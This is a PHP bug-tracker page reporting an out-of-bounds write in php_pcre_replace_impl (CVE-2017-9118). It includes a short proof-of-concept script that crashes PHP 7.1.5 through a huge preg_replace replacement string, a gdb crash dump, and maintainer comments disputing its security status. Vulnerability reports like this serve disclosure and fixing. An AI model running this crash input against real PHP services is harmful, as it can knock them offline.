php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #74604 Out of bounds in php_pcre_replace_impl
Submitted: 2017-05-17 09:12 UTC Modified: 2018-12-08 11:20 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: whitehat002 at hotmail dot com Assigned:
Status: Open Package: PCRE related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: 2017-9118
Have you experienced this issue?
Rate the importance of this bug to you:

 [2017-05-17 09:12 UTC] whitehat002 at hotmail dot com
Description:
------------
It seems to be an out of bounds bug.

Test script:
---------------
<?php
ini_set('memory_limit',-1);
$str=str_repeat("A",0x7ffffffe);
preg_replace("/A/i",$str,"AAAAAAAAAAAAAAAAAA");


Expected result:
----------------
no crash 

Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.5/sapi/cli/php -n poc2.php 
Reading symbols from /root/php-7.1.5/sapi/cli/php...done.
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x36dfdfb0 ('A' <repeats 200 times>...)
EBX: 0xb7200000 
ECX: 0x0 
EDX: 0x41 ('A')
ESI: 0x41 ('A')
EDI: 0xb6c0000d --> 0x0 
EBP: 0xbfffbf98 --> 0xb7013100 ('A' <repeats 200 times>...)
ESP: 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
EIP: 0x8106c7d (<php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl)
EFLAGS: 0x210293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8106c75 <php_pcre_replace_impl+933>:	
    jne    0x8106cb8 <php_pcre_replace_impl+1000>
   0x8106c77 <php_pcre_replace_impl+935>:	mov    eax,DWORD PTR [ebp-0x24]
   0x8106c7a <php_pcre_replace_impl+938>:	movzx  edx,BYTE PTR [eax]
=> 0x8106c7d <php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl
   0x8106c7f <php_pcre_replace_impl+943>:	lea    edx,[eax+0x1]
   0x8106c82 <php_pcre_replace_impl+946>:	add    ebx,0x1
   0x8106c85 <php_pcre_replace_impl+949>:	mov    DWORD PTR [ebp-0x24],edx
   0x8106c88 <php_pcre_replace_impl+952>:	movzx  esi,BYTE PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
0004| 0xbfffbe94 --> 0xb7068048 ('A' <repeats 200 times>...)
0008| 0xbfffbe98 --> 0x0 
0012| 0xbfffbe9c --> 0x20 (' ')
0016| 0xbfffbea0 --> 0x0 
0020| 0xbfffbea4 --> 0x0 
0024| 0xbfffbea8 --> 0xbfffbeb0 --> 0x0 
0028| 0xbfffbeac --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
php_pcre_replace_impl (pce=0x8bb1b30, subject_str=0xb7068038, 
    subject=0xb7068048 'A' <repeats 200 times>..., subject_len=0x20, 
    replace_val=0xb7013110, is_callable_replace=0x0, limit=0xffffffff, 
    replace_count=0xbfffc08c) at /root/php-7.1.5/ext/pcre/php_pcre.c:1317
1317						*walkbuf++ = *walk++;
gdb-peda$ x/s $ebx
0xb7200000:	 <Address 0xb7200000 out of bounds>

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-05-23 01:26 UTC] whitehat002 at hotmail dot com
Has anyone responded to this bug?
 [2017-06-20 06:18 UTC] stas@php.net
-Type: Security +Type: Bug
 [2018-08-03 03:35 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2017-9118
 [2018-12-08 11:20 UTC] cmb@php.net
If it's not a security issue, it shouldn't have a CVE.
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Wed Jun 19 11:01:29 2019 UTC